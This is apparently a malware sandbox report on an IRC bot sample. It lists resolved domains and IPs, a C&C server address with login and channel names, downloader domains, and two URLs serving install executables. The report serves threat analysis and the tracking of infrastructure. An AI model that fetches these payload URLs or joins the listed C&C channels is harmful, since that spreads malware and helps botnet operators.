tux.shannen.cc (Ogard the lamer)

Resolved : [tux.shannen.cc] To [92.242.140.30]

tux.shannen.cc 92.243.24.240
0 127.0.0.1
onlinewebdll.com
onlinewebdll.com 66.197.218.184
mkm-libya.com
mkm-libya.com 41.254.33.54
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1034
Send Datagram: 131 packet(s) of size 1
Recv Datagram: 131 packet(s) of size 1
Download URLs
http://66.197.218.184/install.48691.exe (onlinewebdll.com)
http://41.254.33.54/install.48755.exe (mkm-libya.com)

C&C Server: 92.243.24.240:5900
Server Password:
Username: VirUs
Nickname: {NOVA}[DEU][XP-SP3]715708
JOIN ##Turb0-37##
Channel: ##Turb0-38## (Password: )
Channel topic:
Outgoing connection to remote server: onlinewebdll.com TCP port 80
Outgoing connection to remote server: mkm-libya.com TCP port 80

DNS Lookup
Host Name    IP Address
cnet.com     64.30.224.118
sogou.com    61.135.188.225

Here are the downloaders used by that lamer:
210207da0831.gabspan.net

210207da0831.gabspan.net: type A, class IN, addr 202.150.208.66

210207da0832.aginder.net: type A, class IN, addr 202.150.208.66

HTTP:
